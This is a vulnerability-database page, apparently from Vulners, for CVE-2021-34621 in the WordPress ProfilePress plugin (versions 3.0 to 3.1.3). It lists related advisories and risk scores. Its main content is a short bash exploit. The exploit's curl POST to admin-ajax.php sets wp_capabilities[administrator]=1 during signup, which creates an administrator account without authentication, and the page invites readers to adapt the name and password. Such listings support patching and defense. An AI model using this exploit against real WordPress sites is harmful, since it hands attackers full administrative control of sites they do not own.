Vulners
Lucene search
WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
| Reporter | Title | Published | Views | Family All 23 |
|---|---|---|---|---|
 | WordPress ProfilePress 3.1.3 Plugin - Privilege Escalation (Unauthenticated) Exploit | 31 Aug 202100:00 | – | zdt |
 | Script-for-profile-press-exploit-in-wordpress | 29 Apr 202610:38 | – | githubexploit |
| Exploit for Missing Authentication for Critical Function in Properfraction Profilepress | 9 Aug 202311:41 | – | githubexploit |
| Exploit for Missing Authentication for Critical Function in Properfraction Profilepress | 12 Aug 202321:51 | – | githubexploit |
 | CVE-2021-34621 | 5 Jul 202112:18 | – | circl |
 | WordPress 访问控制错误漏洞 | 7 Jul 202100:00 | – | cnnvd |
 | WordPress ProfilePress plugin trust management issue vulnerability | 9 Jul 202100:00 | – | cnvd |
 | WordPress ProfilePress Plugin Privilege Escalation (CVE-2021-34621) | 29 Sep 202100:00 | – | checkpoint_advisories |
 | CVE-2021-34621 | 7 Jul 202112:21 | – | cve |
 | CVE-2021-34621 ProfilePress 3.0 - 3.1.3 - Unauthenticated Privilege Escalation | 7 Jul 202112:21 | – | cvelist |
10
# Exploit Title: WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
# Date: 23-08-2021
# Exploit Author: Numan Rajkotiya
# Vendor Homepage: https://profilepress.net/
# Software Link: https://downloads.wordpress.org/plugin/wp-user-avatar.3.0.zip
# Version: [1] ProfilePress (Formerly WP User Avatar) 3.0 - 3.13
[2] WordPress 4.7 or higher
# Tested on: ProfilePress 3.0, Apache 2.4, and Windows Build 19043.928
# CVE : CVE-2021-34621
#!/bin/bash
# Exploit for WordPress Plugin ProfilePress 3.0 - 3.1.3
# Change the name and password as per your requirement.
URL=$1
curl -X POST $URL"/wp-admin/admin-ajax.php" \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "reg_username=numan" \
-d "[email protected]" \
-d "reg_password=numan" \
-d "reg_password_present=true" \
-d "wp_capabilities[administrator]=1" \
-d "reg_first_name=pwned" \
-d "reg_last_name=numan" \
-d "action=pp_ajax_signup"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2021 00:00Current
9.5High risk
Vulners AI Score9.5
CVSS 27.5
CVSS 3.19.8
EPSS0.93479
SSVC